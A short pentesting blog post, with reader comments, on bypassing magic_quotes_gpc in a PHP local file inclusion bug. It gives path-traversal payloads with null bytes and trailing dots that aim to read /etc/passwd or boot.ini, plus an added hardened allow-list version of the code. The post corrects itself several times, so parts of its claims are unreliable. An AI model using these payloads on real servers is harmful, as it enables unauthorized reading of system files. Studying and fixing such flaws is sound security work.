www.notsosecure.com

From Pentesters To Pentesters

So, lets look at a piece of code:

<?php include('inc/'.$_GET['page'].'.php'); ?>

Normally, you would use the null byte (%00) to exploit it:

vuln.php?page=../../../../../etc/passwd%00

but if magic_quotes_gpc is enabled then the null byte (%00) will get escaped to \0, meaning that the attack will fail.

How to bypass this: if you add a large number of dots (.....) to the end of the path, the null byte is not required at all. e.g.

vuln.php?page=../../../../../etc/passwd%00.............................................. (200 dots in this case)

vuln.php?page=../../../../../etc/passwd.............................................. (200 dots in this case)

Correction: You don’t need null byte here.

Update: As pointed out by Bodgan, this only works on Windows. So replace /etc/passwd with /../../boot.ini. I will provide a POC link.

Tested on PHP version: 5.2.12 (WAMP environment)
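As an added example that is not part of the original post, here is the include from the post beside a hardened version. It assumes PHP 7.1 or later and an inc/ directory holding home.php, about.php and contact.php; the allow-list and the function names are constructed for this example, not something the post prescribes.

```php
<?php
// Added example (not from the original post). Assumed layout: inc/home.php,
// inc/about.php, inc/contact.php. Allow-list and function names are constructed.

// Vulnerable: user input is concatenated straight into the path. The null-byte
// and dot-truncation tricks only matter because the raw string reaches
// include() at all; magic_quotes_gpc (removed in PHP 5.4) never made this safe.
function include_page_vulnerable(string $page): void
{
    include('inc/' . $page . '.php');
}

// Hardened, step 1: map the request parameter onto a fixed allow-list. The
// input is used only as a lookup key, never as part of a filesystem path.
const PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

function resolve_page(string $page): ?string
{
    // Reject anything that is not a plain identifier before the lookup, so
    // dots, slashes, backslashes and control bytes are never processed.
    if (!preg_match('/\A[a-z0-9_]{1,32}\z/', $page)) {
        return null;
    }
    return PAGES[$page] ?? null;
}

// Hardened, step 2 (defence in depth): even with an allow-list, confirm the
// resolved file really lives inside the include directory. realpath()
// canonicalises "..", symlinks and, on Windows, trailing dots, so a file that
// normalises to a path outside $baseDir is rejected.
function safe_include(string $page, string $baseDir = __DIR__ . '/inc'): bool
{
    $file = resolve_page($page);
    if ($file === null) {
        return false;
    }
    $base = realpath($baseDir);
    $full = realpath($baseDir . DIRECTORY_SEPARATOR . $file);
    if ($base === false || $full === false) {
        return false;
    }
    // Compare with the separator appended so that "inc_private" is not
    // accepted as a child of "inc".
    if (strncmp($full, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return false;
    }
    include $full;
    return true;
}

// Usage: every payload from the post (traversal, %00, trailing dots) fails the
// identifier check and is refused before any filesystem access happens.
$page = $_GET['page'] ?? 'home';
if (!safe_include($page)) {
    http_response_code(404);
    echo 'Unknown page';
}
```

The allow-list is the control that actually closes the hole: because the request parameter is only ever a dictionary key, it does not matter what the operating system does with long paths, trailing dots or embedded null bytes. The realpath() containment check is belt-and-braces for the case where someone later adds an entry to the list that points outside inc/, or where the list is replaced by a directory scan.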

References: http://www.xakep.ru/post/50862/novaya_veha_v_teorii_include.rar

8 Comments

  1. Good one Sid!

  2. s3th
    12:04 pm on February 2nd, 2010

    i wanna see a printscreen :)

  3. No, it’s not about the null byte. It works like this vuln.php?page=../../../../../etc/passwd….(lots of dots). With the null byte it doesn’t work.

    It only works on Windows AND it only works if the include is relative.

    If you have something like:
    include "d:\\xampp\\htdocs\\test\\" . $_GET['i'] . ".txt"; it doesn't work.

  4. sid
    12:18 pm on February 2nd, 2010

    Hi Bogan,

    I have only tested it on Windows; while the backslash (\) will get escaped by magic quotes, the forward slash will not be escaped, so that explains why it will only work if the include is relational on Windows.

    I can confirm that in my windows setup, it worked with null byte. As you pointed out, it doesn’t work with null byte and the null byte is actually not required.

  5. Hi,
    Very interesting, only I am not able to reproduce it. I tested from 100 to > 4096 dots; this does not disable the NULL byte from being escaped.

    You say you tested on WAMP? i.e. Windows? How can /etc/passwd work on Windows?

    I tried on Windows also, and it failed. Could you please explain or give PoC code?

    Thanks

  6. Hi skully, please see the update, you don't need magic quotes at all. I managed to make so many mistakes in a small blog post :(

  7. kuza55
    6:16 am on February 3rd, 2010
  8. [...] Local File Inclusion with Magic_quotes_gpc enabled – notsosecure.com Penetration using magic_quote_gpc and PHP [...]